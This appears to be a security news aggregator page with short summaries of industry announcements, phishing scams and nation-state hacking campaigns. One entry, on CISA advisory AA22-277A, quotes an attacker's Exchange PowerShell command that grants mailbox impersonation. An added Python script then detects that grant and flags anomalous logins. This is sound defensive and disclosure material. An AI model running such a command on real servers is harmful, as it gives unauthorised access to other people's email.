      Semtech has announced that CWD Limited has developed a dual combo module incorporating Semtech’s LoRa Connect platform and the LoRaWAN standard connectivity as well as Bluetooth Low Energy (BLE) to optimize high data rate, long range wireless communication for IoT device connectivity. The CWD CBTLRM02 dual combo module is utilized in smart utility meters and wearables with Semtech’s LoRa Connect (SX1262) System on Chip (SoC) for communication in the 150MHz to 960MHz bands for LoRa … More

      The post Semtech’s LoRa Connect optimizes CWD Limited’s dual combo module for IoT device connectivity appeared first on Help Net Security.

      "

      Autosummary: "


      Callback phishing attacks evolve their social engineering tactics

      financial industry
      2022-10-08 https://www.bleepingcomputer.com/news/security/callback-phishing-attacks-evolve-their-social-engineering-tactics/
      The BazarCall malicious operation has evolved its social engineering methods, keeping the old fake charges lure for the first phase of the attack but then switching to pretending to help the victim deal with an infection or hack. [...] "

      Autosummary: New social engineering tricks The social engineering process has changed in recent callback phishing campaigns, although the bait in the phishing email remains the same, an invoice for a payment made to Geek Squad, Norton, McAfee, PayPal, or Microsoft. "


      Veratad VX improves identity verification and analytics for business users

      industry
      2022-10-07 https://www.helpnetsecurity.com/2022/10/07/veratad-vx/

      Veratad has unveiled “Veratad VX”, a new global age and identity verification platform designed to deliver a no-code journey orchestration and automated verification experience. The new VX orchestration platform is an extension of Veratad’s proven core technology, IDresponse, which currently synthesizes dozens of providers and verification methods, allowing clients to access them through a single API integration. Veratad VX business users can now create sophisticated, multi-touch customer verification workflows without touching a line … More

      The post Veratad VX improves identity verification and analytics for business users appeared first on Help Net Security.

      "

      Autosummary: "


      Phosphorus enhances its xIoT security platform to strengthen enterprise device security

      industry
      2022-10-07 https://www.helpnetsecurity.com/2022/10/07/phosphorus-enterprise-xiot-security-platform/

      Phosphorus announced important new enhancements to its Enterprise xIoT Security Platform that will improve organizations’ ability to reduce their xIoT attack surface and prevent sophisticated threats. “The proliferation of xIoT devices is creating vast new risks for today’s enterprises, with attackers increasingly able to evade defenses and breach companies through these overlooked and often unmonitored devices,” said Sonu Shankar, VP of Product Management at Phosphorus. “Our xIoT security platform already provides unmatched capabilities for finding, … More

      The post Phosphorus enhances its xIoT security platform to strengthen enterprise device security appeared first on Help Net Security.

      "

      Autosummary: Phosphorus’s Enterprise xIoT Security Platform is a consolidated xIoT security offering, delivering Attack Surface Management, Hardening and Remediation, and Detection and Response across the full range of IoT, OT, and Network-connected devices—spanning both new and legacy devices. "


      FBI, CISA, and NSA Reveal How Hackers Targeted a Defense Industrial Base Organization

      industry
      2022-10-05 https://thehackernews.com/2022/10/fbi-cisa-and-nsa-reveal-how-hackers.html
      U.S. cybersecurity and intelligence agencies on Tuesday disclosed that multiple nation-state hacking groups potentially targeted a "Defense Industrial Base (DIB) Sector organization's enterprise network" as part of a cyber espionage campaign. "[Advanced persistent threat] actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the "

      Autosummary: "


      Back to Basics: Cybersecurity's Weakest Link

      industry ciber
      2022-10-04 https://thehackernews.com/2022/10/back-to-basics-cybersecuritys-weakest.html
      A big promise with a big appeal. You hear that a lot in the world of cybersecurity, where you're often promised a fast, simple fix that will take care of all your cybersecurity needs, solving your security challenges in one go. It could be an AI-based tool, a new superior management tool, or something else – and it would probably be quite effective at what it promises to do. But is it a silver "

      Autosummary: All it took was a simple social engineering message – something like, "Hey Bob, I'm from the IT team, and we need to check something on your PC, so I'm sending you a tool for you to run." And it's not just users that need educating – you should reinforce these practices in your security team too, by covering patching, permissions, and overall security positioning. "


      AA22-277A: Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization

      industry
      2022-10-04 https://us-cert.cisa.gov/ncas/alerts/aa22-277a
      Original release date: October 4, 2022

      Summary

      Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:

      • Enforce multifactor authentication (MFA) on all user accounts.
      • Implement network segmentation to separate network segments based on role and functionality.
      • Update software, including operating systems, applications, and firmware, on network assets.
      • Audit account usage.

      From November 2021 through January 2022, the Cybersecurity and Infrastructure Security Agency (CISA) responded to advanced persistent threat (APT) activity on a Defense Industrial Base (DIB) Sector organization’s enterprise network. During incident response activities, CISA uncovered that likely multiple APT groups compromised the organization’s network, and some APT actors had long-term access to the environment. APT actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the network, and also used a custom data exfiltration tool, CovalentStealer, to steal the victim’s sensitive data.

      This joint Cybersecurity Advisory (CSA) provides APT actors tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified during the incident response activities by CISA and a third-party incident response organization. The CSA includes detection and mitigation actions to help organizations detect and prevent related APT activity. CISA, the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) recommend DIB sector and other critical infrastructure organizations implement the mitigations in this CSA to ensure they are managing and reducing the impact of cyber threats to their networks.

      Download the PDF version of this report: pdf, 692 KB

      For a downloada "

      Autosummary: The threat actors first used the service account to remotely access the organization’s Microsoft Exchange server via Outlook Web Access (OWA) from multiple external IP addresses; shortly afterwards, the actors assigned the Application Impersonation role to the service account by running the following PowerShell command for managing Exchange:
      powershell add-pssnapin *exchange*;New-ManagementRoleAssignment -Name:"Journaling-Logs" -Role:ApplicationImpersonation -User:<account>
      This command gave the service account the ability to access other users’ mailboxes. In early March 2021, APT actors exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 (the ProxyLogon chain) to install 17 China Chopper webshells on the Exchange Server.
      DETECTION: Given the actors’ demonstrated capability to maintain persistent, long-term access in compromised enterprise environments, CISA, FBI, and NSA encourage organizations to:
      • Monitor logs for connections from unusual VPSs and VPNs.
      • Monitor for the installation of unauthorized software, including Remote Server Administration Tools (e.g., psexec, RdClient, VNC, and ScreenConnect).
      • To detect use of compromised credentials in combination with a VPS, review logs for “impossible logins,” such as logins with changing username, user agent string, and IP address combinations, or logins where IP addresses do not align with the expected user’s geographic location.
      Table 1: Identified APT Enterprise ATT&CK Tactics and Techniques
      Tactic: Initial Access
      Technique Title: Valid Accounts
      ID: T1078
      Use: Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion (e.g., inappropriate or unauthorized use of administrator accounts, service accounts, or third-party accounts). "
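The detection guidance in the advisory (impossible logins across changing IP and user-agent combinations, source countries that do not match the account, and the ApplicationImpersonation grant the actors made) can be turned into a small hunt over authentication and admin-audit logs. The following Python is an added example written for this page, not code from CISA, FBI, NSA or the advisory. The OWA access lines, the Exchange admin-audit lines, the IP-to-country table and the per-account home countries are all constructed; a production version would replace the table with a real GeoIP lookup and read the lines from the Exchange IIS and admin audit logs. It also flags the role-assignment command the advisory quotes, which the advisory's detection list does not call out separately.

```python
"""Hunt for AA22-277A-style login anomalies and Exchange impersonation grants.

Added example, not part of the CISA advisory. Every log line, IP range and
the country and home-country tables below are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress
import re

# Constructed IP-to-country table standing in for a real GeoIP lookup (assumption).
GEO = {
    "203.0.113.0/24": "US",
    "198.51.100.0/24": "NL",
    "192.0.2.0/24": "RU",
}

# Expected country per account; in practice sourced from HR or IdP data (assumption).
HOME = {"svc_journal": "US", "jdoe": "US"}

# Constructed OWA access log: time, account, source IP, user agent, result.
OWA_LOG = """\
2021-11-02T08:01:10Z svc_journal 203.0.113.5 "Mozilla/5.0 (Windows NT 10.0)" success
2021-11-02T08:14:52Z svc_journal 198.51.100.7 "python-requests/2.25.1" success
2021-11-02T08:20:03Z svc_journal 192.0.2.9 "Mozilla/5.0 (X11; Linux x86_64)" success
2021-11-02T09:00:00Z jdoe 203.0.113.44 "Mozilla/5.0 (Windows NT 10.0)" success
2021-11-02T17:30:00Z jdoe 203.0.113.44 "Mozilla/5.0 (Windows NT 10.0)" success
"""

# Constructed Exchange admin-audit lines: time, actor, cmdlet and parameters.
ADMIN_LOG = """\
2021-11-02T08:16:30Z svc_journal Get-Mailbox -ResultSize 10
2021-11-02T08:17:02Z svc_journal New-ManagementRoleAssignment -Name:"Journaling-Logs" -Role:ApplicationImpersonation -User:svc_journal
2021-11-03T10:00:00Z exadmin Set-MailboxDatabase -Identity DB01 -ProhibitSendQuota 5GB
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)" (\S+)$')
ROLE_RE = re.compile(r"New-ManagementRoleAssignment\b.*\bApplicationImpersonation\b", re.I)


def country_of(ip):
    """Map an IP to a country with the constructed table; None if unknown."""
    addr = ipaddress.ip_address(ip)
    for net, cc in GEO.items():
        if addr in ipaddress.ip_network(net):
            return cc
    return None


def parse_owa(text):
    """Parse the constructed OWA format into event dicts with datetime stamps."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, user, ip, ua, result = m.groups()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "user": user, "ip": ip, "ua": ua, "result": result})
    return events


def impossible_logins(events, window=timedelta(hours=1), max_ips=1, max_uas=1):
    """Flag accounts whose successful logins inside `window` span more than
    `max_ips` source IPs or `max_uas` user agents (one finding per account),
    and every login from a country other than the account's home country."""
    findings = []
    by_user = defaultdict(list)
    for e in events:
        if e["result"] == "success":
            by_user[e["user"]].append(e)
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            span = [e for e in evs[i:] if e["ts"] - first["ts"] <= window]
            ips = {e["ip"] for e in span}
            uas = {e["ua"] for e in span}
            if len(ips) > max_ips or len(uas) > max_uas:
                findings.append((user, "changing-ip-or-ua", sorted(ips)))
                break
        for e in evs:
            cc = country_of(e["ip"])
            if cc and HOME.get(user) and cc != HOME[user]:
                findings.append((user, "geo-mismatch", e["ip"]))
    return findings


def impersonation_grants(text):
    """Return (actor, line) for each ApplicationImpersonation role assignment."""
    hits = []
    for line in text.splitlines():
        if ROLE_RE.search(line):
            actor = line.split(" ", 2)[1]
            hits.append((actor, line))
    return hits


if __name__ == "__main__":
    for finding in impossible_logins(parse_owa(OWA_LOG)):
        print("impossible login:", finding)
    for actor, line in impersonation_grants(ADMIN_LOG):
        print("impersonation grant by", actor, "->", line)
```

The thresholds (one IP and one user agent per hour) are deliberately strict for the sample and need tuning against a real population of mobile and VPN users. Treat a role-grant hit as something to reconcile with change records rather than as proof of compromise: ApplicationImpersonation is legitimately assigned to some archiving and backup integrations, which is exactly why the actors named theirs "Journaling-Logs".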


      AlphaSOC Analytics Engine identifies emerging threats in near real-time

      industry
      2022-10-03 https://www.helpnetsecurity.com/2022/10/03/alphasoc-analytics-engine/

      AlphaSOC announced its new AlphaSOC Analytics Engine (AE) solution, a differentiated cloud-native network traffic analysis (NTA) product that uniquely identifies compromised workloads across Amazon Web Services, Microsoft Azure, and Google Cloud Platform. Threat actors bypass existing controls by using novel command and control (C2) infrastructure that is not recognized by legacy security products. Data can also be exfiltrated from victim cloud environments via DNS tunneling, ICMP tunneling, and anonymizing circuit protocols (e.g., Tor, I2P, Freenet) … More

      The post AlphaSOC Analytics Engine identifies emerging threats in near real-time appeared first on Help Net Security.

      "

      Autosummary: “With AlphaSOC AE we are moving the industry from reactive identification of known threats, such as a domain or IP address associated with a threat actor, towards proactive identification of threats, such as a compute instance beaconing to a newly registered domain which is unique to the customer environment and has suspicious properties,” said Chris McNab, CEO and co-founder, AlphaSOC. "


      Prison for ex-eBay staff who aggressively cyberstalked company’s critics with Craigslist sex party ads and funeral wreaths

      industry
      2022-09-30 https://www.bitdefender.com/blog/hotforsecurity/prison-for-ex-ebay-staff-who-aggressively-cyberstalked-companys-critics-with-craigslist-sex-party-ads-and-funeral-wreaths-2/
      Two men, who previously worked at eBay, have been sentenced to prison after admitting their role in a cyberstalking campaign that targeted the editor and publisher of a newsletter that criticised the company. Read more in my article on the Hot for Security blog. "

      Autosummary: The harassment campaign launched by the group of eBay employees included:
      • sending anonymous, threatening messages
      • delivering a funeral wreath, a mask of a bloody pig's face, live insects, and a book on surviving the loss of a spouse
      • sending pornography addressed to the Steiners, but delivered to their neighbours
      • posting adverts for sex parties at the couple's home on Craigslist
      • traveling across the country to spy on the Steiners, and attempting to plant a GPS tracker on their car
      Fearing for their lives, the Steiners installed surveillance cameras to monitor anyone approaching their home. "


      Aunalytics Security Patching Platform protects users against system compromise

      industry
      2022-09-29 https://www.helpnetsecurity.com/2022/09/29/aunalytics-security-patching-platform/

      Aunalytics initiated its Security Patching Platform, Co-managed Patching as a Service to complement the company’s Advanced Security solution suite. Windows OS and supported 3rd party patch management allow for tighter security in the defense against cyberattacks and the new offering ensures active remediation. According to a 2022 Data Breach Investigations Report by Verizon, around 70 percent of successful cyberattacks exploited known vulnerabilities with available patches, making it important to update operating systems and applications regularly … More

      The post Aunalytics Security Patching Platform protects users against system compromise appeared first on Help Net Security.

      "

      Autosummary: The platform facilitates collaboration between IT and security teams and includes the following capabilities:
      • Inventory and performance management and proactive alerting
      • Patch deployment control strategy, prioritization, planning
      • Patch vetting and blacklisting intelligence
      • Windows Operating System patch management
      • Supported 3rd Party Patch Management
      • Anti-Malware
      • DNS-based Malware Protection
      • Device Encryption Management
      • Innovative management tool library
      “Security patch exploits can have extremely damaging effects on an organization, decreasing revenues or causing reputational damage, making it imperative to have security patching in place,” said Chris Nicholson, Vice President of Managed IT Services. "


      Embedded IoT security threats and challenges

      industry
      2022-09-29 https://www.helpnetsecurity.com/2022/09/29/embedded-iot-security-threats-challenges-video/

      IoT embedded systems combine hardware, firmware, and internet connectivity to carry out particular functions. These devices transfer real-time data via the internet for various purposes, including tracking, monitoring, and analysis. In this Help Net Security video, Hubertus Grobbel, VP of Security Solutions at Swissbit, discusses the insecurity of IoT devices and offers tips on how to secure them.

      The post Embedded IoT security threats and challenges appeared first on Help Net Security.

      "

      Autosummary: "


      Data security trends: 7 statistics you need to know

      industry
      2022-09-29 https://www.helpnetsecurity.com/2022/09/29/data-security-trends/

      U.S. businesses are at high risk for data security threats from increasingly effective phishing attempts and the lack of procedures to restrict data access, according to GetApp’s 4th Annual Data Security Report. Newer companies are especially vulnerable to security threats. This survey of IT security managers and employees reveals seven significant trends related to data security threats facing U.S. businesses: 1. Phishing emails are on the rise, and so are the employees clicking the links … More

      The post Data security trends: 7 statistics you need to know appeared first on Help Net Security.

      "

      Autosummary: Phishing emails are on the rise, and so are the employees clicking the links This year, 89% of companies surveyed report receiving a phishing email, a jump from 77% who said the same in 2021. "


      TransUnion TruValidate Device Risk with Behavioral Analytics improves fraud detection for businesses

      industry
      2022-09-28 https://www.helpnetsecurity.com/2022/09/28/transunion-truvalidate-device-risk-with-behavioral-analytics/

      To help limit the more than $100 billion of global sales revenue lost to false positives during the fraud detection process, TransUnion launched TruValidate Device Risk with Behavioral Analytics. The solution is newly fortified by NeuroID’s behavioral analytics and aims to help businesses stop fraud – not good customers – based on device recognition, context, device and user behavior. The solution builds trusted connections by allowing users to join a global network of 6,000 fraud … More

      The post TransUnion TruValidate Device Risk with Behavioral Analytics improves fraud detection for businesses appeared first on Help Net Security.

      "

      Autosummary: By analyzing this data in real-time, these products can help provide critical information as to whether a loan applicant’s intentions are genuine, or deceptive, without adding any additional friction to the process,” said Jason Laky, executive vice president and head of financial services at TransUnion. "


      GuidePoint Security releases ICS Security Services to address OT security challenges

      industry
      2022-09-28 https://www.helpnetsecurity.com/2022/09/29/guidepoint-security-ics-security-services/

      GuidePoint Security has released its ICS Security Services that include a Security Program Review, Security Architecture Review and ICS Penetration Testing that collectively are designed to provide an organization with a holistic view of their entire ICS security posture. Traditionally, Operational Technology (OT) environments were kept separate and isolated from the traditional IT infrastructure. Today, ICS environments have emerged from the combination of IT and OT (Industry 4.0), introducing new features and easier management, but … More

      The post GuidePoint Security releases ICS Security Services to address OT security challenges appeared first on Help Net Security.

      "

      Autosummary: GuidePoint’s ICS Security Service offerings include: Security Program Review (SPR): The SPR evaluates and measures an organization’s security program maturity and is based on the framework chosen by the customer, including, but not limited to: NIST Cybersecurity Framework (CSF), NIST SP 800-82, CIS Controls, ISA/IEC 62443, ISO 27001, C2M2, FERC/NERC CIP, CISA TSS and ITU CIIP. "


      Exmatter exfiltration tool used to implement new extortion tactics

      industry
      2022-09-26 https://securityaffairs.co/wordpress/136226/cyber-crime/exmatter-tool-shift-extortion-tactics.html

      Ransomware operators are switching to new extortion tactics, using the Exmatter malware with newly added data corruption functionality. The data extortion landscape is constantly evolving and threat actors are devising new extortion techniques; the use of Exmatter is one such case. Cyderes Special Operations and Stairwell Threat Research researchers spotted a sample […]

      The post Exmatter exfiltration tool used to implement new extortion tactics appeared first on Security Affairs.

      "



      Ransomware data theft tool may show a shift in extortion tactics

      exploits industry
      2022-09-25 https://www.bleepingcomputer.com/news/security/ransomware-data-theft-tool-may-show-a-shift-in-extortion-tactics/
      Data exfiltration malware known as Exmatter, previously linked with the BlackMatter ransomware group, is now being upgraded with data corruption functionality, which may indicate a new tactic that ransomware affiliates could switch to in the future. [...]

      Autosummary: Many ransomware operations run as Ransomware-as-a-Service, where operators/developers are in charge of developing the ransomware and the payment site and of handling negotiations, while affiliates join to breach corporate networks, steal data, delete backups, and encrypt devices.


      Void Balaur Hackers-for-Hire Targeting Russian Businesses and Politics Entities

      industry
      2022-09-23 https://thehackernews.com/2022/09/void-balaur-hackers-for-hire-group-now.html
      A hack-for-hire group that was first exposed in 2019 has expanded its focus to set its sights on entities with business or political ties to Russia. Dubbed Void Balaur, the cyber mercenary collective has a history of launching cyberattacks against biotechnology and telecom companies since 2015. As many as 3,500 victims have been reported as of November 2021. "Void Balaur [...] primarily dabbles "

      Autosummary: "Void Balaur also goes after targets valuable for prepositioning or facilitating future attacks, SentinelOne researcher Tom Hegel said, adding the targets span Russia, the U.S., the U.K., Taiwan, Brazil, Kazakhstan, Ukraine, Moldova, Georgia, Spain, Central African Republic, and Sudan. "


      NSA shares guidance to help secure OT/ICS critical infrastructure

      industry
      2022-09-22 https://www.bleepingcomputer.com/news/security/nsa-shares-guidance-to-help-secure-ot-ics-critical-infrastructure/
      The National Security Agency (NSA) and CISA have issued guidance on how to secure operational technology (OT) and industrial control systems (ICS) that are part of U.S. critical infrastructure. [...]

      Autosummary: In January, the FBI, CISA, and NSA issued a similar joint advisory, exposing multiple Russian threat groups (including APT29, APT28, and the Sandworm Team) targeting US critical infrastructure organizations. In today's advisory [PDF], you can find detailed information on how to block threat actors' attacks at every step, including attempts to collect intelligence, gain initial access, or deploy and execute malicious tools in compromised critical infrastructure systems.


      Phosphorus and Dewpoint collaborate to deliver a new generation of xIoT security solutions

      industry
      2022-09-22 https://www.helpnetsecurity.com/2022/09/23/phosphorus-dewpoint/

      Phosphorus has announced a partnership with Dewpoint. The IT and security solutions provider will act as a value-added reseller (VAR) for Phosphorus in the US market. The new partnership will see the two companies jointly delivering a new generation of xIoT security solutions in the US to meet growing enterprise demand for xIoT attack surface management and remediation capabilities. “xIoT security is a critical need for today’s enterprises, and these risks are left unaddressed by … More

      The post Phosphorus and Dewpoint collaborate to deliver a new generation of xIoT security solutions appeared first on Help Net Security.

      "

      Autosummary: "


      ThreatQ TDR Orchestrator addresses industry needs for simpler implementation

      industry
      2022-09-21 https://www.helpnetsecurity.com/2022/09/21/threatquotient-tdr-orchestrator/

      ThreatQuotient has released a new version of ThreatQ TDR Orchestrator, the solution for a simplified, data-driven approach to security operations. Built on the ThreatQ Platform, the continued innovation of ThreatQ TDR Orchestrator includes enhanced automation, analysis and reporting capabilities that accelerate threat detection and response across disparate systems. The latest research from ThreatQuotient, planned for full release later in 2022, shows signs that adoption of security automation is advancing, as budgets in this area are … More

      The post ThreatQ TDR Orchestrator addresses industry needs for simpler implementation appeared first on Help Net Security.

      "

      Autosummary: Atomic Automation allows for immediate action when a complex response is not needed; Automation Packs for vulnerability prioritization, indicator enrichment, XDR, and more use cases (coming soon) help users get started with common use cases quickly.


      Energy bill rebate scams spread via SMS and email

      financial industry
      2022-09-21 https://grahamcluley.com/energy-bill-rebate-scams-spread-via-sms-and-email/
      The UK’s National Cyber Security Centre (NCSC) has warned that fraudsters are sending out emails and SMS texts urging homeowners to sign up for a discount on their energy bills.


      Scammers send fake "Energy Bills Support Scheme" texts

      financial industry
      2022-09-21 https://www.malwarebytes.com/blog/news/2022/09/energy-scammers-send-fake-energy-bills-support-scheme-texts


      Watch out for an energy-themed scam being sent out via SMS which plays on energy price fears.


      The post Scammers send fake "Energy Bills Support Scheme" texts appeared first on Malwarebytes Labs.

      "

      Autosummary: First it asks potential victims to enter a variety of personal information: name, date of birth, phone number, address, city and postcode. Once this is done, the site asks for your current energy supplier and provides a list of pre-fills; it then asks for payment card details, the card security code among them. It also places the logo of whichever company you’ve selected at the top of the page, along with the following message: “This should be the account linked to your [business name] account.”


      Phosphorus and EverSec Group collaboration expands xIoT security throughout the US

      industry
      2022-09-18 https://www.helpnetsecurity.com/2022/09/19/phosphorus-eversec-group/

      Phosphorus has joined forces with EverSec Group. The cybersecurity solutions provider and security advisor to many of the world’s largest brand names will act as a value-added reseller (VAR) for Phosphorus in the U.S. market. The new partnership will see the two companies jointly delivering a new generation of xIoT security solutions in the U.S. to meet growing enterprise demand for xIoT attack surface management and remediation capabilities. “This exciting collaboration with a proven solution … More

      The post Phosphorus and EverSec Group collaboration expands xIoT security throughout the US appeared first on Help Net Security.

      "

      Autosummary: "


      Daon IdentityX voice biometrics now available on Genesys’ Cloud CX platform

      industry
      2022-09-14 https://www.helpnetsecurity.com/2022/09/14/daon-identityx/

      Daon has announced the availability of IdentityX voice biometrics on the Genesys AppFoundry. Leveraging the Genesys AudioHook API, the new integration delivers identity verification and proofing, mitigates fraudulent account-take-over (ATO) and increases the speed of customers moving through their desired workflows. This connectivity to Daon IdentityX is easy for Genesys customers to implement, and runs seamlessly in the background. This solution addresses a growing need among businesses: In 2021, incidents of fraud cost Americans $25 … More

      The post Daon IdentityX voice biometrics now available on Genesys’ Cloud CX platform appeared first on Help Net Security.

      "

      Autosummary: "


      Keysight unveils automotive test solution for mobile industry processor interface

      industry
      2022-09-14 https://www.helpnetsecurity.com/2022/09/14/keysight-automotive-test-solution/

      Keysight Technologies has released a new automotive serializer/deserializer (SerDes) receiver (Rx) compliance test solution to verify mobile industry processor interface (MIPI) A-PHY devices based on the Compliance Test Specification (CTS) requirements. This solution was developed in collaboration with BitifEye Digital Test Solutions and Wilder Technologies, with the support of Valens Semiconductor. Silicon vendors are planning to implement MIPI A-PHY, a long-reach physical layer interface for automotive and other surround-sensor applications, including cameras and in-vehicle infotainment … More

      The post Keysight unveils automotive test solution for mobile industry processor interface appeared first on Help Net Security.

      "

      Autosummary: “Our customers will benefit from testing solutions that enable device makers of new automotive in-vehicle networks, either standardized or accepted, to become global standards for automotive high-speed data transmission,” Henaut continued.


      Securing your IoT devices against cyber attacks in 5 steps

      industry
      2022-09-14 https://www.bleepingcomputer.com/news/security/securing-your-iot-devices-against-cyber-attacks-in-5-steps/
      How is IoT being used in the enterprise, and how can it be secured? We will demonstrate important security best practices and show why a secure password policy is paramount to the security of these devices. [...]

      Autosummary: Today, modern IoT systems include a combination of the following:
      - Wireless networks: the connectivity platform for IoT systems; they enable IoT smart devices and sensors to be placed anywhere wireless networks can reach.
      - Cloud or private data center database locations: store the mass of information and telemetry data generated, captured, and communicated by the IoT device.
      - Hardware sensors: collect data from a wide range of systems depending on the device, the use case, and other aspects.
      - Smart devices: traditionally "dumb" devices that perform various tasks and now have embedded intelligent sensors and the capability to connect to wireless networks for transmitting the data collected.
      - Compute engines: analyze the raw data collected from IoT devices and hardware sensors and provide intelligent insights from it.
      IoT security implications: While IoT is an amazingly powerful technology that organizations can benefit from, businesses do well to consider the security implications of IoT as they relate to their overall security posture. Businesses realize the benefits and value coming from IoT devices, including:
      - improved productivity and efficiency from the insights gained from IoT-connected devices;
      - data-driven insights that help make business decisions;
      - realizing the full potential of revenue streams and developing new revenue models;
      - easily connecting the physical world with the digital world, which helps to drive innovation, agility, efficiency, and new understandings of data models.
      IoT devices work hand-in-hand with modern machine-learning algorithms, allowing the mass of collected data to be analyzed very quickly so that businesses can extrapolate intelligent business insights. In general, IoT refers to devices with embedded software, sensors, network connectivity, and other technologies, allowing them to exchange data with other devices connected to the Internet. Internet of Things (IoT) devices are connecting the physical world with the digital one. With the prevalence of broadband network connectivity, wireless networks, and now 5G mobile networks in remote locations, it is now possible to connect any device to the network, including IoT devices.


      Forescout and First Health Advisory partner to help organizations mitigate IT, IoT, OT, and IoMT risks

      industry
      2022-09-14 https://www.helpnetsecurity.com/2022/09/15/forescout-first-health-advisory/

      The Forescout Technologies and First Health Advisory partnership creates an approach to connected asset risk management by automating the technical data collection, mitigation and risk reduction measures for a healthcare organization’s entire network, encompassing IT, IoT, OT, and IoMT assets. Healthcare organizations’ networks are under constant attack, and these organizations often do not have the human capital needed to oversee the work required to thwart a potential threat or attack through quick response. This challenge places added … More

      The post Forescout and First Health Advisory partner to help organizations mitigate IT, IoT, OT, and IoMT risks appeared first on Help Net Security.

      "

      Autosummary: "


      Pro-Palestinian group GhostSec hacked Berghof PLCs in Israel

      industry
      2022-09-13 https://securityaffairs.co/wordpress/135656/hacktivism/ghostsec-hacked-berghof-plcs-israel.html

      The pro-Palestinian hacktivist collective GhostSec claimed to have compromised 55 Berghof programmable logic controllers (PLCs) used by Israeli organizations as part of a Free Palestine campaign. On September 4, 2022, GhostSec announced on social media and its Telegram channel that it had compromised […]

      The post Pro-Palestinian group GhostSec hacked Berghof PLCs in Israel appeared first on Security Affairs.

      "

      Autosummary: “In the message it published, GhostSec attached a video demonstrating a successful log-in to the PLC’s admin panel, together with an image of an HMI screen showing its current state and control of the PLC process, and another image showing that the PLC had been stopped.”


      Palestinian Hacktivist Group GhostSec Compromises 55 Berghof PLCs Across Israel

      industry
      2022-09-12 https://thehackernews.com/2022/09/palestinian-hacktivist-group-ghostsec.html
      A hacktivist collective called GhostSec has claimed credit for compromising as many as 55 Berghof programmable logic controllers (PLCs) used by Israeli organizations as part of a "Free Palestine" campaign. Industrial cybersecurity firm OTORIO, which dug deeper into the incident, said the breach was made possible owing to the fact that the PLCs were accessible through the Internet and were "

      Autosummary: The attacks against Israeli targets, dubbed "#OpIsrael," are said to have commenced on June 28, 2022, citing "continuous attacks from Israel towards Palestinians."


      CyberLink and MediaTek join forces to provide AI solution for facial recognition AIoT apps

      industry
      2022-09-10 https://www.helpnetsecurity.com/2022/09/11/cyberlink-mediatek/

      CyberLink has integrated its AI facial recognition engine, FaceMe, into MediaTek’s new AIoT platform, Genio. The pairing of FaceMe’s engine with the Genio platform gives the market an AI solution for facial recognition AIoT applications. Edge computing for facial recognition with low latency: CyberLink’s cross-platform AI facial recognition engine, FaceMe, already supports numerous operating systems and is optimized for IoT and AIoT platforms. With the recent integration of MediaTek’s Genio 1200, FaceMe further provides IoT/AIoT developers … More

      The post CyberLink and MediaTek join forces to provide AI solution for facial recognition AIoT apps appeared first on Help Net Security.

      "

      Autosummary: "


      North Korean Lazarus hackers take aim at U.S. energy providers

      industry
      2022-09-08 https://www.bleepingcomputer.com/news/security/north-korean-lazarus-hackers-take-aim-at-us-energy-providers/
      The North Korean APT group "Lazarus" (APT38) is exploiting VMware Horizon servers to access the corporate networks of energy providers in the United States, Canada, and Japan. [...]

      Autosummary: This diversification is illustrated in the Lazarus hackers' wide range of attacks, including their targeting of IT job seekers, the creation of fake cryptocurrency trading apps, the creation of trojanized development tools, the use of ransomware as a decoy, and the massive $620 million cryptocurrency theft from the Ronin bridge.


      North Korean Lazarus Hackers Targeting Energy Providers Around the World

      industry
      2022-09-08 https://thehackernews.com/2022/09/north-korean-lazarus-hackers-targeting.html
      A malicious campaign mounted by the North Korea-linked Lazarus Group is targeting energy providers around the world, including those based in the United States, Canada, and Japan. “The campaign is meant to infiltrate organizations around the world for establishing long-term access and subsequently exfiltrating data of interest to the adversary’s nation-state,” Cisco Talos said in a report shared "



      North Korea-linked Lazarus APT targets energy providers around the world

      industry
      2022-09-08 https://securityaffairs.co/wordpress/135469/apt/north-korea-linked-lazarus-apt-targets-energy-providers-around-the-world.html

      Talos researchers tracked a campaign, orchestrated by the North Korea-linked Lazarus APT group, aimed at energy providers around the world, including organizations in the US, Canada, and Japan. The campaign was observed between February and July 2022. The attacks […]

      The post North Korea-linked Lazarus APT targets energy providers around the world appeared first on Security Affairs.

      "

      Autosummary: Talos researchers tracked a campaign, orchestrated by North Korea-linked Lazarus APT group, aimed at energy providers around the world, including organizations in the US, Canada, and Japan. "


      Toys behaving badly: How parents can protect their family from IoT threats

      industry
      2022-09-08 https://www.welivesecurity.com/2022/09/08/toys-behaving-badly-how-parents-protect-family-iot-threats/

      It pays to do some research before taking a leap into the world of internet-connected toys

      The post Toys behaving badly: How parents can protect their family from IoT threats appeared first on WeLiveSecurity

      "

      Autosummary: This could include features like:
      - microphones and cameras that receive video and audio from the child;
      - speakers and screens to relay audio and video back to the child;
      - Bluetooth to link the toy up to a connected app;
      - Internet connectivity to the home Wi-Fi router.
      With this kind of technology, smart toys can go beyond the inanimate playthings most of us grew up with. How to mitigate the privacy and security risks of smart toys: with smart toys representing a certain degree of security and privacy risk, consider the following best-practice advice to counter the threats. Do your research before buying: check whether there has been negative publicity or research done on the model’s security and privacy credentials. Attackers could theoretically hijack a smart toy with audio capabilities to attack smart homes, by sending audio commands to a voice-activated system (e.g., “Alexa, open the front door”).


      SymphonyAI Industrial KPI 360 allows manufacturers to view operational data through a single dashboard

      industry
      2022-09-07 https://www.helpnetsecurity.com/2022/09/07/symphonyai-industrial-kpi-360/

